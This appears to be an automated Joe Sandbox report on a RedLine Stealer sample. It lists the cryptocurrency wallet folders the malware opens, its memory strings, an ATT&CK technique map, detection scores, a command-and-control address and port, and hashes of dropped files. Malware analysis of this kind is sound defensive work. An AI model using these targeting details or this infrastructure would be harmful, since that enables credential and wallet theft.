Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: b3u71vBG0u.exe	Binary or memory string: WIN_81
Source: b3u71vBG0u.exe	Binary or memory string: WIN_XP
Source: b3u71vBG0u.exe	Binary or memory string: WIN_XPe
Source: b3u71vBG0u.exe	Binary or memory string: WIN_VISTA
Source: b3u71vBG0u.exe	Binary or memory string: WIN_7
Source: b3u71vBG0u.exe	Binary or memory string: WIN_8
Source: b3u71vBG0u.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b3u71vBG0u.exe.23a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: b3u71vBG0u.exe PID: 6292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1928, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.b3u71vBG0u.exe.23a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: b3u71vBG0u.exe PID: 6292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1928, type: MEMORYSTR

Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007B6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_007B6596
Source: C:\Users\user\Desktop\b3u71vBG0u.exe	Code function: 0_2_007B6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_007B6A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	221 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	227 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Masquerading	LSA Secrets	361 Security Software Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	221 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	221 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
b3u71vBG0u.exe	63%	Virustotal		Browse
b3u71vBG0u.exe	61%	ReversingLabs	Win32.Trojan.Strab
b3u71vBG0u.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
api.ip.sb	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/envelope/	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/actor/next	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://ipinfo.io/ip%appdata%	0%	Avira URL Cloud	safe
http://185.38.142.10:7474	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
http://tempuri.org/Endpoint/CheckConnectResponse	0%	Avira URL Cloud	safe
https://ipinfo.io/ip%appdata%	0%	Virustotal		Browse
http://schemas.datacontract.org/2004/07/	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	0%	Avira URL Cloud	safe
http://185.38.142.10:7474	12%	Virustotal		Browse
http://tempuri.org/Endpoint/EnvironmentSettings	0%	Avira URL Cloud	safe
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	Avira URL Cloud	safe
http://schemas.datacontract.org/2004/07/	0%	Virustotal		Browse
https://api.ip.sb	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnectResponse	1%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	0%	Virustotal		Browse
http://tempuri.org/Endpoint/CheckConnect	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/VerifyUpdateResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettings	2%	Virustotal		Browse
http://tempuri.org/Endpoint/SetEnvironment	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://api.ip.sb	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://185.38.142.10:7474/	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/VerifyUpdateResponse	1%	Virustotal		Browse
http://tempuri.org/Endpoint/GetUpdates	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/CheckConnect	2%	Virustotal		Browse
https://api.ipify.orgcookies//settinString.Removeg	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/SetEnvironmentResponse	1%	Virustotal		Browse
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	0%	Virustotal		Browse
http://tempuri.org/Endpoint/GetUpdatesResponse	0%	Avira URL Cloud	safe
http://185.38.142.10:7474/	12%	Virustotal		Browse
185.38.142.10:7474	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/VerifyUpdate	0%	Avira URL Cloud	safe
http://tempuri.org/Endpoint/GetUpdates	1%	Virustotal		Browse
http://tempuri.org/0	0%	Avira URL Cloud	safe
185.38.142.10:7474	12%	Virustotal		Browse
http://tempuri.org/Endpoint/SetEnvironment	1%	Virustotal		Browse
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	1%	Virustotal		Browse
http://tempuri.org/Endpoint/GetUpdatesResponse	1%	Virustotal		Browse
http://tempuri.org/Endpoint/VerifyUpdate	1%	Virustotal		Browse
http://tempuri.org/0	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ip.sb	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.38.142.10:7474/	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
185.38.142.10:7474	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ipinfo.io/ip%appdata%	b3u71vBG0u.exe, 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.38.142.10:7474	RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1833328417.0000000002C85000.00000004.00000800.00020000.00000000.sdmp	false	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/CheckConnectResponse	RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.datacontract.org/2004/07/	RegSvcs.exe, 00000001.00000002.1833328417.0000000002C85000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX	RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettings	RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ip.sb/geoip%USERPEnvironmentROFILE%	b3u71vBG0u.exe, 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.ip.sb	RegSvcs.exe, 00000001.00000002.1833328417.0000000002B91000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	RegSvcs.exe, 00000001.00000002.1833328417.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/	RegSvcs.exe, 00000001.00000002.1833328417.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/CheckConnect	RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdateResponse	RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironment	RegSvcs.exe, 00000001.00000002.1833328417.0000000002C85000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/SetEnvironmentResponse	RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/GetUpdates	RegSvcs.exe, 00000001.00000002.1833328417.0000000002C85000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1833328417.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	false	URL Reputation: safe	unknown
https://api.ipify.orgcookies//settinString.Removeg	b3u71vBG0u.exe, 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/GetUpdatesResponse	RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Endpoint/VerifyUpdate	RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/0	RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RegSvcs.exe, 00000001.00000002.1834484741.0000000003D04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1834484741.0000000003D5D000.00000004.00000800.00020000.00000000.sdmp, tmp91A6.tmp.1.dr, tmp5958.tmp.1.dr, tmp5969.tmp.1.dr, tmp5937.tmp.1.dr, tmp598A.tmp.1.dr, tmp9194.tmp.1.dr, tmp5948.tmp.1.dr, tmp5927.tmp.1.dr, tmp597A.tmp.1.dr, tmp9183.tmp.1.dr, tmp9195.tmp.1.dr, tmp91B6.tmp.1.dr	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/actor/next	RegSvcs.exe, 00000001.00000002.1833328417.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.38.142.10	unknown	Portugal		47674	NETSOLUTIONSNL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1464015
Start date and time:	2024-06-28 08:56:58 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	b3u71vBG0u.exe renamed because original name is a hash value
Original Sample Name:	464709f3215d06f6703eb4ecb607ae7a.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@4/51@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 59 Number of non-executed functions: 266
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 104.26.13.31, 104.26.12.31, 172.67.75.172
Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:57:59	API Interceptor	45x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.38.142.10	2MbHBiqXH2.rtf	Get hash	malicious	RedLine	Browse	185.38.142.10:7474/
	YPSvIjQCzd.exe	Get hash	malicious	RedLine	Browse	185.38.142.10:7474/
	Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc	Get hash	malicious	RedLine	Browse	185.38.142.10:7474/
	MSH INV 2024-0117 Secure Payment Invoice for .exe	Get hash	malicious	RedLine	Browse	185.38.142.10:7474/

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NETSOLUTIONSNL	2MbHBiqXH2.rtf	Get hash	malicious	RedLine	Browse	185.38.142.10
	YPSvIjQCzd.exe	Get hash	malicious	RedLine	Browse	185.38.142.10
	Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc	Get hash	malicious	RedLine	Browse	185.38.142.10
	MSH INV 2024-0117 Secure Payment Invoice for .exe	Get hash	malicious	RedLine	Browse	185.38.142.10
	sclfmLKwR7.elf	Get hash	malicious	Gafgyt, Mirai	Browse	185.38.142.103
	3nYvEPuDi1.elf	Get hash	malicious	Gafgyt, Mirai	Browse	185.38.142.103
	DS4T3FyXbu.elf	Get hash	malicious	Gafgyt, Mirai	Browse	185.38.142.103
	pDHAW6Eo6E.elf	Get hash	malicious	Gafgyt	Browse	185.38.142.103
	q5TDXPUPJg.elf	Get hash	malicious	Gafgyt	Browse	185.38.142.22
	K8pQUoHdUc.elf	Get hash	malicious	Gafgyt	Browse	185.38.142.22

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2666
Entropy (8bit):	5.345804351520589
Encrypted:	false
SSDEEP:	48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHpHt1qHxLHjH4:vq5qxqdqolqztYqh3oPtI6mq7qoT5JNV
MD5:	90757169D333CB9247B01FB0CAF14023
SHA1:	C47A0AA0CBC960527EA4FA7F61AC1D08B56C23A5
SHA-256:	C04472992BF7CF58327D947D334F1105C14C5CF0D2DD0DF7E7873CAADE0EC61D
SHA-512:	A49B90272EC353DE49C508AF75C509D14A18EA50ABD1CD49BF5313A708CB9654A543E3340C74978B5756A66EF291132E93931853CAD7CC8C85450BB64A318031
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,

C:\Users\user\AppData\Local\Temp\Okeghem

Download File

Process:	C:\Users\user\Desktop\b3u71vBG0u.exe
File Type:	data
Category:	dropped
Size (bytes):	97792
Entropy (8bit):	7.025754446172288
Encrypted:	false
SSDEEP:	1536:zGkNRRFkyMZ/lYFV5X70lmn8tPpdXJqHOoRmJTUI0GVqIu5iL8A8U4:zGqylyhgXJqHO7wJU4
MD5:	A178429ECD4CAD8C92AA4E2774F5F755
SHA1:	372207EE15719CFE001F4EDE770EF5A18479F61F
SHA-256:	90F3B22BEC26DF402A0AB8FEF7DF8FBF79E5D74F9ED0F25943D1D5E7E2FE020B
SHA-512:	E171458A68435A342F39B1C98F96FBB059B85F3DA634134F4338DF02674CD71ADB6C086604F257624A781D71F8B530B1CDB5908B06035EFABA099B628AFBD823
